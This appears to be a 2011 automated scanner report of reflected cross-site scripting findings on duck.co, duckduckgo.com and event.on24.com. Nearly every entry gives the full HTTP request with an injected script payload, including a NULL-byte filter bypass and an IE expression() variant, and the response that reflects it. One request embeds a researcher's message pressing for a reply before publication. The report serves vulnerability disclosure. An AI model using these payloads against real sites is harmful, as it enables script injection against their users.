<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/i-would-love-it-iff-i-need-ideas-fast-please-click?b3e68"><script>alert(1)</script>87b04d6b67=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.72. http://duck.co/topic/logging-in-message-email-not-confirmed [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/logging-in-message-email-not-confirmed

Request

GET /topic/logging-in-message-email-not-confirmed?a0e4f"><script>alert(1)</script>83801aafa08=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=62DC997A865BBF66ADEAFC12A811D6E0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:49 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/logging-in-message-email-not-confirmed?a0e4f"><script>alert(1)</script>83801aafa08=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.73. http://duck.co/topic/maps [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/maps

Request

GET /topic/maps?5c925"><script>alert(1)</script>ec7c925f095=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=52D63293940E20BB0AE844B0B8A0BABB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:36 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/maps?5c925"><script>alert(1)</script>ec7c925f095=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.74. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/opera-thread-include-duckduckgo-in-default-search-engines

Request

GET /topic/opera-thread-include-duckduckgo-in-default-search-engines?19ff2"><script>alert(1)</script>ec978105e19=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9B089F9DC83D91BE5EF48E27F78CA0FF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:33 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/opera-thread-include-duckduckgo-in-default-search-engines?19ff2"><script>alert(1)</script>ec978105e19=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.75. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/pages-without-favicon-uses-ddg-favicon

Request

GET /topic/pages-without-favicon-uses-ddg-favicon?b78dc"><script>alert(1)</script>19944b86e4b=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=65C7D78F2AC808D79058929856CEAF1A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:31 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/pages-without-favicon-uses-ddg-favicon?b78dc"><script>alert(1)</script>19944b86e4b=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.76. http://duck.co/topic/post-your-ddg-sticker-photos [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/post-your-ddg-sticker-photos

Request

GET /topic/post-your-ddg-sticker-photos?c1bbe"><script>alert(1)</script>1efb70b60cd=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=327ADC48E6A2831C337F1D4796FA2D88; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:50:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/post-your-ddg-sticker-photos?c1bbe"><script>alert(1)</script>1efb70b60cd=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.77. http://duck.co/topic/q-html-entities [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/q-html-entities

Request

GET /topic/q-html-entities?4fa68"><script>alert(1)</script>073136e6f64=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=DA8D1BC3858EA1A193E9B89F7A8CE464; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/q-html-entities?4fa68"><script>alert(1)</script>073136e6f64=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.78. http://duck.co/topic/searching-for-roommates-on-craigslist [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/searching-for-roommates-on-craigslist

Request

GET /topic/searching-for-roommates-on-craigslist?4773d"><script>alert(1)</script>d0df6064d55=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0AB749E754F41962FC0E1FE4FCF99C9B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:35 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/searching-for-roommates-on-craigslist?4773d"><script>alert(1)</script>d0df6064d55=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.79. http://duck.co/topic/spam-site-found [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/spam-site-found

Request

GET /topic/spam-site-found?8dfd1"><script>alert(1)</script>2034ae4d0ac=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0AF19D151D1F54E1DAB65D1A15B73EDE; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/spam-site-found?8dfd1"><script>alert(1)</script>2034ae4d0ac=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.80. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/userscript-which-prevents-you-from-accidentally-posting-as-guest

Request

GET /topic/userscript-which-prevents-you-from-accidentally-posting-as-guest?70d99"><script>alert(1)</script>a95a7f3faab=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E821B1976D5AD47B8C3E5840FFC29986; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:31 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest?70d99"><script>alert(1)</script>a95a7f3faab=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.81. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/want-more-visitors-ehh-needs-to-look-more-proffesional

Request

GET /topic/want-more-visitors-ehh-needs-to-look-more-proffesional?3f6b2"><script>alert(1)</script>e1ce290b314=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=149B5ACDBAC8ECD5A3AD192855EF01F6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/want-more-visitors-ehh-needs-to-look-more-proffesional?3f6b2"><script>alert(1)</script>e1ce290b314=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.82. http://duck.co/topic/words-to-live-by [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/words-to-live-by

Request

GET /topic/words-to-live-by?7bca3"><script>alert(1)</script>3db6225d9d=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=2E7B41A2D46440EF7AADA9200033F848; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:39 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/words-to-live-by?7bca3"><script>alert(1)</script>3db6225d9d=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.83. http://duck.co/topic/wot-highlighting [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/wot-highlighting

Request

GET /topic/wot-highlighting?46a5e"><script>alert(1)</script>a597b698c68=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7FEBD9395486DE8A8C73005231D99BFD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:42 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/wot-highlighting?46a5e"><script>alert(1)</script>a597b698c68=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.84. http://duckduckgo.com/d.js [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /d.js

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d.js?q=labor%20day&l=us-en&p=1&s=0fd848%3balert(1)//50b232c4064 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:00:25 GMT
Content-Type: application/x-javascript; charset=UTF-8
Connection: keep-alive
Expires: Tue, 01 Mar 2011 02:00:24 GMT
Cache-Control: no-cache
Content-Length: 10225

var dnd0fd848;alert(1)//50b232c4064=[{"a":"<b>Labor</b> <b>Day</b> is a United States federal holiday observed on the first Monday in...The first <b>Labor</b> <b>Day</b> in the United States was obser
...[SNIP]...

3.85. http://duckduckgo.com/ie/v1/api/oembed [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /ie/v1/api/oembed

Request

GET /ie/v1/api/oembed?urls=http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20&maxwidth=600&format=json&callback=nreb7f9b0<script>alert(1)</script>8507e3cbdcf&wmode=window HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:04:46 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 4284
Etag: "38f10b9f04d62850a2a65097544421170720cecb"

nreb7f9b0<script>alert(1)</script>8507e3cbdcf([{"provider_url": "http://www.amazon.com", "description": "Amazon.com: Labor Day: A Novel (P.S.) (9780061843419): Joyce Maynard: Books", "title": "Labor Day: A Novel (P.S.)", "url": "http://www.amazon
...[SNIP]...

3.86. http://duckduckgo.com/ie/v1/api/oembed [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /ie/v1/api/oembed

Request

GET /ie/v1/api/oembed?urls=http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20&maxwidth=60074352<script>alert(1)</script>f9cc82e6622&format=json&callback=nreb&wmode=window HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:02:35 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 237
Etag: "0d7ad701c72dca3be3b9f6e55a30464277b6dae3"

nreb([{"url": "http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20", "error_code": 400, "error_message": "Invalid \"maxwidth\" parameter: 60074352<script>alert(1)</script>f9cc82e6622", "type": "error"}])

3.87. http://duckduckgo.com/ie/v1/api/oembed [urls parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /ie/v1/api/oembed

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ie/v1/api/oembed?urls=http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20%00f860f<script>alert(1)</script>6c0fb59df07&maxwidth=600&format=json&callback=nreb&wmode=window HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:01:10 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 4431
Etag: "3c94481d6ac9a4e9cf563571613b25c7de20be99"

nreb([{"provider_url": "http://www.amazon.com", "description": "Amazon.com: Labor Day: A Novel (P.S.) (9780061843419): Joyce Maynard: Books", "title": "Labor Day: A Novel (P.S.)", "url": "http://www.a
...[SNIP]...
<a href=\"http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20\u0000f860f<script>alert(1)</script>6c0fb59df07\">
...[SNIP]...

3.88. http://duckduckgo.com/iq/v1/twitter/cloudscan/services.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /iq/v1/twitter/cloudscan/services.json

Request

GET /iq/v1/twitter/cloudscan/services.json?callback=nrqwc0e0f<script>alert(1)</script>06b651e61e6&request_id=r1-1 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=cloudscan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:01:10 GMT
Content-Type: application/json; charset=utf-8
Connection: keep-alive
X-Mashery-Responder: proxyworker-eu-i-cd6d64b9.mashery.com
Etag: "c1f1907da906622eeb6b54534f66ee95"
Cache-Control: max-age=0, private, must-revalidate
X-Frame-Options: DENY
Set-Cookie: _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlZGYwNWJhNDA1ZjU5YzNlYjU5YTg2YmYzM2M4NGZjZmU%3D--822e80b66e52ed75bf4f919c7814336667e9e4c5; path=/; HttpOnly
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Ua-Compatible: IE=Edge,chrome=1
X-Runtime: 0.009354
Accept-Ranges: bytes
Content-Length: 380

nrqwc0e0f<script>alert(1)</script>06b651e61e6({"services":[{"type":"twitter","url":"http://twitter.com/cloudscan","username":"cloudscan"},{"type":"blogger","url":"http://cloudscan.blogspot.com/","username":"cloudscan"},{"type":"klout","url":"http
...[SNIP]...

3.89. http://duckduckgo.com/iq/v1/twitter/cloudscan/services.json [request_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /iq/v1/twitter/cloudscan/services.json

Request

GET /iq/v1/twitter/cloudscan/services.json?callback=nrqw&request_id=r1-135ecf<script>alert(1)</script>dd5222ad637 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=cloudscan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:01:59 GMT
Content-Type: application/json; charset=utf-8
Connection: keep-alive
X-Mashery-Responder: proxyworker-eu-i-b76f66c3.mashery.com
Etag: "5d6aa27ef217e228a9dae61829d78b76"
Cache-Control: max-age=0, private, must-revalidate
X-Frame-Options: DENY
Set-Cookie: _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlZmU0NDI2NGE5MDM2ODI5ZmE0YWQzZGRkZDRlNGY5MmQ%3D--f32a273e9458140e43394d39ba612c9b3fefba08; path=/; HttpOnly
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Ua-Compatible: IE=Edge,chrome=1
X-Runtime: 0.010260
Accept-Ranges: bytes
Content-Length: 380

nrqw({"services":[{"type":"twitter","url":"http://twitter.com/cloudscan","username":"cloudscan"},{"type":"blogger","url":"http://cloudscan.blogspot.com/","username":"cloudscan"},{"type":"klout","url":"http://klout.com/cloudscan","username":"cloudscan"}],"public_url":"http://qwerly.com/twitter/cloudscan","request_id":"r1-135ecf<script>alert(1)</script>dd5222ad637","status":200})

3.90. https://duckduckgo.com/e.js [go parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /e.js

Request

GET /e.js?from=h02332%40gmail.com&body=Hoyt+LLC+Research+investigates+and+reports+on+security+vulnerabilities+embedded+in+Web+Applications+and+Products+used+in+wide-scale+deployment.+%0D%0A%0D%0ADisclosure+Info+%40+URI+http%3A%2F%2Fwww.cloudscan.me%2Fp%2Fhoyt-llc-research-vulnerability.html%0D%0A%0D%0AHello+-+David+Hoyt+here+with+Hoyt+LLC+Research+in+Boston%2C+MA+with+a+Private+Vuln+Report.+You%27ve+got+XSS%2C+everywhere...+everywhere..+%0D%0A%0D%0AE-mail+me+back+at+h02332%40gmail.com+quickly+if+you+don%27t+wants+this+published+at+URI+http%3A%2F%2Fxss.cx%2Fi%2Fduck.co-xss-1.jpg+and+http%3A%2F%2Fxss.cx%2Fi%2Fduckduckgo.com-xss-1.jpg%0D%0A%0D%0ABest%3B%0D%0A%0D%0ADavid%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A&copy=on&go=b22ea"><script>alert(1)</script>5eb08d60423fdb9ed HTTP/1.1
Host: duckduckgo.com
Connection: keep-alive
Referer: http://duckduckgo.com/feedback.html
Cache-Control: max-age=0
Origin: http://duckduckgo.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:17:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Sun, 12 Nov 1999 20:28:05 GMT
Content-Length: 1425

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="robots" content="no
...[SNIP]...
<a href="b22ea"><script>alert(1)</script>5eb08d60423fdb9ed">
...[SNIP]...

3.91. https://event.on24.com/eventRegistration/EventLobbyServlet [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542954f9"><x%20style%3dx%3aexpression(alert(1))>935c7211ee2&partnerref=ocom&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:29:57 GMT
